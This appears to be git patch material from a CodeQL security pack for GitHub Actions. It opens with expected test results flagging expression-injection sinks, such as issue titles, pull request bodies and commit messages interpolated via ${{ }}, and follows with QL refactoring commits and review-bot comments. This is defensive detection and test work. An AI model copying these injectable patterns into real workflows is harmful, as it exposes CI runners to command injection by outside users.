| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | From 86075c95bd5293284dadc34f02d27c2f1c3801af Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 7 Mar 2024 22:28:54 +0100 Subject: [PATCH 088/707] Improve ExpressionNode Location handling --- ql/lib/codeql/actions/Ast.qll | 20 +++++++++++-------- .../actions/controlflow/internal/Cfg.qll | 9 ++++++--- 2 files changed, 18 insertions(+), 11 deletions(-) 
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 21d4f052e130..1f4794ae9bc5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -68,21 +68,25 @@ class ExpressionNode extends AstNode, TExpressionNode { Job getJob() { result.getAChildNode*() = n } + /** + * Gets the length of each line in the StringValue . + */ int lineLength(int idx) { exists(string line | line = n.getValue().splitAt("\n", idx) and result = line.length() + 1) } - bindingset[i] - int unboundPartialLineLengthSum(int i) { - result = sum(int j, int length | j in [0 .. i] and length = this.lineLength(j) | length) - } - + /** + * Gets the sum of the length of the lines up to the given index. + */ int partialLineLengthSum(int i) { i in [0 .. count(n.getValue().splitAt("\n"))] and - result = this.unboundPartialLineLengthSum(i) + result = sum(int j, int length | j in [0 .. i] and length = this.lineLength(j) | length) } - predicate expressionOffsets(int sl, int sc, int el, int ec) { + /** + * Gets the absolute coordinates of the expression. + */ + predicate expressionLocation(int sl, int sc, int el, int ec) { exists(int lineDiff, string style, Location loc | loc = n.asYamlNode().getLocation() and lineDiff = loc.getEndLine() - loc.getStartLine() and @@ -164,7 +168,7 @@ class ExpressionNode extends AstNode, TExpressionNode { predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { path = n.asYamlNode().getFile().getAbsolutePath() and - this.expressionOffsets(sl, sc, el, ec) + this.expressionLocation(sl, sc, el, ec) } override File getFile() { result = n.asYamlNode().getFile() } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 0972ae500398..8cd640ace096 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
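Review bot: The new doc comment on `expressionLocation` documents a predicate as if it were a getter, and the one on `lineLength` has a stray space before the period and does not say why the line length gets `+ 1`. QL convention documents predicates with "Holds if", so I would write `/** Holds if the expression spans lines sl..el and columns sc..ec in absolute file coordinates. */` on `expressionLocation` and `/** Gets the length of line idx of the StringValue, counting its trailing newline separator. */` on `lineLength`. Because of that `+ 1` the last line is also counted as if it ended in a newline, which the `exprOffset` comparisons in `partialLineLengthSum` callers presumably rely on; stating it in the comment saves the next reader from re-deriving it. The body of `expressionLocation` continues outside the hunk.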
@@ -274,10 +274,13 @@ private class RunTree extends StandardPreOrderTree instanceof Run { private class StringValueTree extends StandardPreOrderTree instanceof StringValue { override ControlFlowTree getChildNode(int i) { result = - rank[i](ExpressionNode child, int sl, int el, int sc, int ec, string path | - child = super.getAChildNode() and child.hasLocationInfo(path, sl, sc, el, ec) + rank[i](ExpressionNode child, Location l | + child = super.getAChildNode() and + l = child.getLocation() | - child order by sl, sc, ec, el, child.toString() + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() ) } } From 9b97dbd870a8aa386082b21893e1d372e5ecf95b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 12 Mar 2024 10:16:43 +0100 Subject: [PATCH 089/707] Refactor ast nodes --- ql/lib/codeql/Locations.qll | 4 +- ql/lib/codeql/actions/Ast.qll | 907 ++------------- ql/lib/codeql/actions/ast/internal/Ast.qll | 1001 +++++++++++++++++ .../actions/controlflow/internal/Cfg.qll | 19 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 2 +- ql/lib/ext/actions_github-script.model.yml | 3 - ql/src/Debug/partial.ql | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-094/CriticalExpressionInjection.ql | 4 +- .../Security/CWE-094/ExpressionInjection.ql | 4 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 7 +- ql/test/library-tests/test.expected | 427 +++---- ql/test/library-tests/test.ql | 29 +- 15 files changed, 1287 insertions(+), 1128 deletions(-) create mode 100644 ql/lib/codeql/actions/ast/internal/Ast.qll diff --git a/ql/lib/codeql/Locations.qll b/ql/lib/codeql/Locations.qll index 33a8eba30acb..96b5d45f18e0 100644 --- a/ql/lib/codeql/Locations.qll +++ b/ql/lib/codeql/Locations.qll 
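Review bot: The `order by` key in the rewritten `rank[i]` sorts on `l.getEndColumn()` before `l.getEndLine()`, which is not a positional order: an expression that ends on a later line but at a smaller column ranks before one that ends earlier, so the CFG child order can diverge from source order for multi-line values. This preserves the old `sl, sc, ec, el` key, so it may be deliberate, but if positional order is intended the key should read `l.getStartLine(), l.getStartColumn(), l.getEndLine(), l.getEndColumn(), child.toString()`. Note also that `l = child.getLocation()` silently drops any `ExpressionNode` for which `getLocation()` has no result, so such a child disappears from the tree rather than surfacing as an error; a short comment stating that every `ExpressionNode` is expected to have a `Location` would make that assumption explicit.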
@@ -1,7 +1,7 @@ /** Provides classes for working with locations. */ import files.FileSystem -import codeql.actions.Ast +import codeql.actions.ast.internal.Ast bindingset[loc] pragma[inline_late] @@ -19,7 +19,7 @@ newtype TLocation = locations_default(_, file, startline, startcolumn, endline, endcolumn) ) or - exists(ExpressionNode e | + exists(ExpressionImpl e | e.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) ) or diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 1f4794ae9bc5..2bfedd623f5c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
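Review bot: The new `import codeql.actions.ast.internal.Ast` is a public import, so `codeql.Locations` now re-exports `ExpressionImpl` and the rest of the internal AST module to every file that imports `Locations`, which works against the point of moving these classes under `internal`. The only use in this file is the `exists(ExpressionImpl e | ...)` in the `TLocation` newtype of the second hunk, so `private import codeql.actions.ast.internal.Ast` would suffice unless some other module relies on the transitive export. If the public import is intentional, a one-line comment explaining why would help: `// Public on purpose: downstream modules rely on the re-export of the internal AST.`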
